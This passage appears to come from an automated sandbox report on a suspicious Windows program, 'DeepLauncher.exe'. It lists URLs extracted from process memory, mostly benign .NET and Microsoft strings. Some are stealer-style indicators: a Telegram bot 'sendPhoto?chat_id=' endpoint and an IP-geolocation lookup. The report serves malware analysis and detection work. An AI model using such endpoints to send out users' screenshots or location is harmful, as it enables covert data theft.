http://ns.photo/ | DeepLauncher.exe, 00000000.00000003.1662967255.00000233C8ABB000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1663054490.00000233C8AD1000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ns.a.0/sTy | DeepLauncher.exe, 00000000.00000003.1662967255.00000233C8ABB000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1663054490.00000233C8AD1000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | DeepLauncher.exe, 00000000.00000002.2563983126.000001F3330C9000.00000004.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563696431.000001F332820000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200 | DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp | false | | high
https://aka.ms/dotnet/info | DeepLauncher.exe | false | | high
https://aka.ms/winforms-warnings/ | DeepLauncher.exe, 00000000.00000002.2569211926.00000233C71A6000.00000004.10000000.00040000.00000000.sdmp | false | | high
http://www.micom/pkiops/Docs/ry.htm0 | powershell.exe, 00000006.00000002.1522901895.00000220C9EFE000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.microsoft.co | powershell.exe, 00000006.00000002.1531770760.00000220C9FA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1534008835.00000220CA137000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 0000000E.00000002.1817076970.00000174BB37F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.datacontract.org/2004/07/NETdesign.Plugin.Notifer8 | DeepLauncher.exe, 00000000.00000002.2563983126.000001F333098000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.microsoft.co5 | powershell.exe, 00000006.00000002.1531770760.00000220C9FA0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/dotnet/app-launch-failed | DeepLauncher.exe | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince | DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp | false | | high
http://schemas.dataconX | DeepLauncher.exe, 00000000.00000002.2563983126.000001F333098000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://.css | DeepLauncher.exe | false | | high
http://ns.dob | DeepLauncher.exe, 00000000.00000003.1662967255.00000233C8ABB000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1663054490.00000233C8AD1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20 | DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp | false | | high
https://aka.ms/dotnet-core-applaunch? | DeepLauncher.exe | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication | DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp | false | | high
https://github.com/dotnet/runtime | DeepLauncher.exe, 00000000.00000002.2562350709.000001F32EEB1000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563165264.000001F330741000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A18000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562497945.000001F32EEF0000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566297559.00000233C5531000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5C73000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563012536.000001F330710000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562423615.000001F32EED1000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562816385.000001F3306E0000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A10000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562578727.000001F32EF01000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562970930.000001F330701000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566373042.00000233C5571000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563393856.000001F330790000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566027392.00000233C5400000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562892333.000001F3306F1000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562792361.000001F3306D1000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563277960.000001F330771000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563203699.000001F330760000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562624925.000001F32EF10000.00000004.10000000.00040000.00000000.sdmp | false | | high
https://api.telegram.org/bot/sendPhoto?chat_id= | DeepLauncher.exe, 00000000.00000002.2563983126.000001F33303A000.00000004.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563696431.000001F332820000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid | DeepLauncher.exe, 00000000.00000002.2566297559.00000233C5531000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566027392.00000233C5400000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp | false | | high
https://aka.ms/dotnet-warnings/ | DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5C73000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563012536.000001F330710000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566107474.00000233C5430000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2567540441.00000233C5FA0000.00000004.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A10000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562578727.000001F32EF01000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562970930.000001F330701000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A1F000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566027392.00000233C5400000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562892333.000001F3306F1000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563203699.000001F330760000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562624925.000001F32EF10000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563088639.000001F330730000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566221492.00000233C54B1000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563468243.000001F3307A1000.00000020.00001000.00020000.00000000.sdmp | false | | high
http://ip-api.com/json/ | DeepLauncher.exe, 00000000.00000002.2563696431.000001F332820000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o | DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp | false | | high
https://aka.ms/nativeaot-compatibility | DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5B11000.00000020.00001000.00020000.00000000.sdmp | false | | high
https://github.com/dotnet/runtime/is | | | |